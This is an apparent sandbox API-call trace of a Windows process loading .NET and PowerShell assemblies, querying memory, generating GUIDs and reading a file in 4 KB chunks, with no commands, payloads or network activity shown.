	[0121.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0121.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0121.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0121.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0121.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0121.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.ServiceProcess\\2.0.0.0__b03f5f7f11d50a3a\\System.ServiceProcess.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.ServiceProcess\\2.0.0.0__b03f5f7f11d50a3a\\System.ServiceProcess.dll", lpFilePart=0x0) returned 0x66
	[0121.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0121.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0121.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0121.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0121.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\mscorlib\\2.0.0.0__b77a5c561934e089\\mscorlib.dll", lpFilePart=0x0) returned 0x4a
	[0121.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xd7edd89de0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0121.364] VirtualQuery (in: lpAddress=0xedd893f0, lpBuffer=0xd7edd8a2b0, dwLength=0x30 | out: lpBuffer=0xd7edd8a2b0*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.364] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x20f74b16, Data2=0xa61c, Data3=0x4bbd, Data4=([0]=0x9f, [1]=0xe, [2]=0x67, [3]=0x8, [4]=0x64, [5]=0xa0, [6]=0xdb, [7]=0x45))) returned 0x0
	[0121.364] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xfc90bd6b, Data2=0x8a5e, Data3=0x4cc4, Data4=([0]=0xa1, [1]=0xd9, [2]=0x7d, [3]=0x18, [4]=0x23, [5]=0x49, [6]=0xc3, [7]=0x0))) returned 0x0
	[0121.364] VirtualQuery (in: lpAddress=0xedd895a0, lpBuffer=0xd7edd8a460, dwLength=0x30 | out: lpBuffer=0xd7edd8a460*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.365] VirtualQuery (in: lpAddress=0xedd895a0, lpBuffer=0xd7edd8a460, dwLength=0x30 | out: lpBuffer=0xd7edd8a460*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.365] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x1b8b03a5, Data2=0xf9c0, Data3=0x4eb7, Data4=([0]=0xa7, [1]=0xc4, [2]=0x82, [3]=0x52, [4]=0xd7, [5]=0x28, [6]=0x50, [7]=0xb4))) returned 0x0
	[0121.366] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x70cb2003, Data2=0x9900, Data3=0x4d62, Data4=([0]=0x96, [1]=0xea, [2]=0xdc, [3]=0x1e, [4]=0x50, [5]=0x8f, [6]=0x9e, [7]=0x76))) returned 0x0
	[0121.367] VirtualQuery (in: lpAddress=0xedd897f0, lpBuffer=0xd7edd8a6b0, dwLength=0x30 | out: lpBuffer=0xd7edd8a6b0*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.368] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xdbeb5b72, Data2=0x12bb, Data3=0x4b30, Data4=([0]=0x95, [1]=0xb, [2]=0xa8, [3]=0xc0, [4]=0x62, [5]=0x94, [6]=0xd4, [7]=0x2c))) returned 0x0
	[0121.368] VirtualQuery (in: lpAddress=0xedd897f0, lpBuffer=0xd7edd8a6b0, dwLength=0x30 | out: lpBuffer=0xd7edd8a6b0*(BaseAddress=0xedd89000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xd6fff87000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30
	[0121.369] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xcd311b47, Data2=0xd26d, Data3=0x46b2, Data4=([0]=0xa6, [1]=0x14, [2]=0x59, [3]=0x5a, [4]=0x97, [5]=0x8c, [6]=0x28, [7]=0x49))) returned 0x0
	[0121.369] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xcf013ee5, Data2=0x1d57, Data3=0x477d, Data4=([0]=0xbe, [1]=0x42, [2]=0x8e, [3]=0xe8, [4]=0x81, [5]=0x4a, [6]=0xdb, [7]=0x5e))) returned 0x0
	[0121.375] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.375] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.375] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.375] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.375] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.376] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.376] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.376] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.376] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.376] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.376] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.376] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.376] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.376] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.377] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.377] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.377] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.377] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.377] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.377] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.377] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.377] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.377] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.377] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.378] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.378] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.378] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.378] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.378] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.378] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x1000, lpOverlapped=0x0) returned 1
	[0121.380] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0xbef, lpOverlapped=0x0) returned 1
	[0121.380] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e862b7, nNumberOfBytesToRead=0x11, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e862b7*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x0, lpOverlapped=0x0) returned 1
	[0121.380] ReadFile (in: hFile=0x694, lpBuffer=0x2ad23e86b60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xd7edd8a8c8, lpOverlapped=0x0 | out: lpBuffer=0x2ad23e86b60*, lpNumberOfBytesRead=0xd7edd8a8c8*=0x0, lpOverlapped=0x0) returned 1
	[0121.380] CloseHandle (hObject=0x694) returned 1
	[0121.386] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x7cbfadbe, Data2=0x79c3, Data3=0x4649, Data4=([0]=0xaa, [1]=0x3e, [2]=0xaf, [3]=0x74, [4]=0x76, [5]=0x1, [6]=0x9e, [7]=0xbc))) returned 0x0
	[0121.386] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x65be5a3b, Data2=0x6c26, Data3=0x4927, Data4=([0]=0x8f, [1]=0x2e, [2]=0x7, [3]=0xa3, [4]=0x6d, [5]=0x96, [6]=0x8f, [7]=0x57))) returned 0x0
	[0121.386] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x9e3e8fa, Data2=0xda1b, Data3=0x4ea1, Data4=([0]=0x81, [1]=0x8f, [2]=0x2d, [3]=0x3b, [4]=0xf1, [5]=0x66, [6]=0xe0, [7]=0x1e))) returned 0x0
	[0121.387] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x751604e8, Data2=0x7811, Data3=0x4dd1, Data4=([0]=0x8a, [1]=0xb9, [2]=0x4b, [3]=0x5a, [4]=0x1d, [5]=0x96, [6]=0x34, [7]=0x5d))) returned 0x0
	[0121.387] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xe822b272, Data2=0x5c37, Data3=0x40aa, Data4=([0]=0x8c, [1]=0x33, [2]=0x7e, [3]=0xf6, [4]=0x74, [5]=0x21, [6]=0x7, [7]=0x6))) returned 0x0
	[0121.387] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x4b83501c, Data2=0xcf7a, Data3=0x419d, Data4=([0]=0xae, [1]=0x33, [2]=0x51, [3]=0xe1, [4]=0xc5, [5]=0x38, [6]=0x4, [7]=0xd4))) returned 0x0
	[0121.388] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xcd485532, Data2=0xa0f3, Data3=0x410a, Data4=([0]=0x93, [1]=0x46, [2]=0x20, [3]=0x2f, [4]=0xef, [5]=0x18, [6]=0x84, [7]=0x31))) returned 0x0
	[0121.389] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xb7858b0b, Data2=0xf24c, Data3=0x4452, Data4=([0]=0xaa, [1]=0x3e, [2]=0x96, [3]=0xde, [4]=0xfd, [5]=0x99, [6]=0x34, [7]=0x74))) returned 0x0
	[0121.389] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x3a2c4037, Data2=0xfd89, Data3=0x4b12, Data4=([0]=0xb9, [1]=0x48, [2]=0xea, [3]=0xf5, [4]=0x3a, [5]=0x3d, [6]=0x5c, [7]=0xac))) returned 0x0
	[0121.389] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xbe8c2a99, Data2=0xcfbc, Data3=0x4ad8, Data4=([0]=0xbc, [1]=0x99, [2]=0x5c, [3]=0x4a, [4]=0x20, [5]=0x11, [6]=0x5e, [7]=0x17))) returned 0x0
	[0121.389] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x94e219d7, Data2=0x8c6a, Data3=0x445f, Data4=([0]=0xbf, [1]=0xac, [2]=0x1e, [3]=0xd9, [4]=0xdc, [5]=0xb, [6]=0x11, [7]=0xb9))) returned 0x0
	[0121.390] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x8a02f66, Data2=0x1826, Data3=0x4d9b, Data4=([0]=0x94, [1]=0x5b, [2]=0xc3, [3]=0xa5, [4]=0x6d, [5]=0x63, [6]=0xa3, [7]=0x61))) returned 0x0
	[0121.391] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x2df52037, Data2=0xbd1e, Data3=0x4b2a, Data4=([0]=0xbc, [1]=0x4e, [2]=0xbb, [3]=0xa, [4]=0xcc, [5]=0x62, [6]=0xde, [7]=0x6a))) returned 0x0
	[0121.392] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x6e10e3a6, Data2=0x2861, Data3=0x453e, Data4=([0]=0xbe, [1]=0x91, [2]=0xe5, [3]=0x8b, [4]=0x6e, [5]=0xf4, [6]=0xd8, [7]=0x85))) returned 0x0
	[0121.392] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x7495a782, Data2=0xa7c0, Data3=0x4620, Data4=([0]=0x88, [1]=0x48, [2]=0xc0, [3]=0xd9, [4]=0xcc, [5]=0x82, [6]=0xea, [7]=0x6a))) returned 0x0
	[0121.393] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xc48913e4, Data2=0xf707, Data3=0x4d1d, Data4=([0]=0xbb, [1]=0x5e, [2]=0xd5, [3]=0xb8, [4]=0x98, [5]=0x71, [6]=0xe2, [7]=0x6))) returned 0x0
	[0121.393] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x7e88cca9, Data2=0xee02, Data3=0x47d5, Data4=([0]=0x9f, [1]=0xd5, [2]=0xcb, [3]=0x23, [4]=0x7c, [5]=0x9d, [6]=0x5f, [7]=0x6))) returned 0x0
	[0121.393] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xfc2683d4, Data2=0xeebf, Data3=0x4374, Data4=([0]=0xab, [1]=0x55, [2]=0x6b, [3]=0xe5, [4]=0x94, [5]=0x72, [6]=0xa9, [7]=0x27))) returned 0x0
	[0121.394] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xe00cc5b, Data2=0xb2f4, Data3=0x43fe, Data4=([0]=0x8d, [1]=0xe7, [2]=0x9a, [3]=0x1, [4]=0xae, [5]=0x3e, [6]=0xe2, [7]=0x3e))) returned 0x0
	[0121.394] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xfc3b14fe, Data2=0x10e1, Data3=0x41e2, Data4=([0]=0xa1, [1]=0xf, [2]=0xe9, [3]=0xf5, [4]=0x51, [5]=0x4f, [6]=0xf5, [7]=0x11))) returned 0x0
	[0121.394] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x45060249, Data2=0x4901, Data3=0x424c, Data4=([0]=0x8f, [1]=0x3d, [2]=0x74, [3]=0xf8, [4]=0x51, [5]=0x75, [6]=0x7c, [7]=0xc1))) returned 0x0
	[0121.395] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xd385fddc, Data2=0xd473, Data3=0x4e94, Data4=([0]=0xbc, [1]=0xce, [2]=0x24, [3]=0x42, [4]=0x81, [5]=0x2, [6]=0x8d, [7]=0xf3))) returned 0x0
	[0121.395] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x229c9597, Data2=0xaa61, Data3=0x4f26, Data4=([0]=0x9d, [1]=0x3, [2]=0x69, [3]=0x9e, [4]=0xc6, [5]=0xef, [6]=0x59, [7]=0x3b))) returned 0x0
	[0121.395] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x5468c163, Data2=0x318d, Data3=0x428c, Data4=([0]=0xbd, [1]=0xa7, [2]=0xff, [3]=0x9b, [4]=0x54, [5]=0x6e, [6]=0xbe, [7]=0x47))) returned 0x0
	[0121.396] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x6e2bb88d, Data2=0xbfa7, Data3=0x458d, Data4=([0]=0xb6, [1]=0x8e, [2]=0x63, [3]=0x78, [4]=0xd0, [5]=0x2c, [6]=0xdd, [7]=0xb0))) returned 0x0
	[0121.396] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x188ddf8, Data2=0xa468, Data3=0x425a, Data4=([0]=0xa0, [1]=0xb4, [2]=0x9b, [3]=0xb7, [4]=0x5f, [5]=0x43, [6]=0x1c, [7]=0xac))) returned 0x0
	[0121.396] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0x971504ae, Data2=0x53a7, Data3=0x48d6, Data4=([0]=0xbb, [1]=0xd2, [2]=0x94, [3]=0x23, [4]=0x52, [5]=0x4d, [6]=0xba, [7]=0xbc))) returned 0x0
	[0121.397] CoCreateGuid (in: pguid=0xd7edd8ab80 | out: pguid=0xd7edd8ab80*(Data1=0xe6e5a8b7, Data2=0x7cd7, Data3=0x4596, Data4=([0]=0xaf, [1]=0x34, [2]=0x36, [3]=0x5b, [4]=0x27, [5]=0x6b, [6]=0xa8, [7]=0xff))) returned 0x0
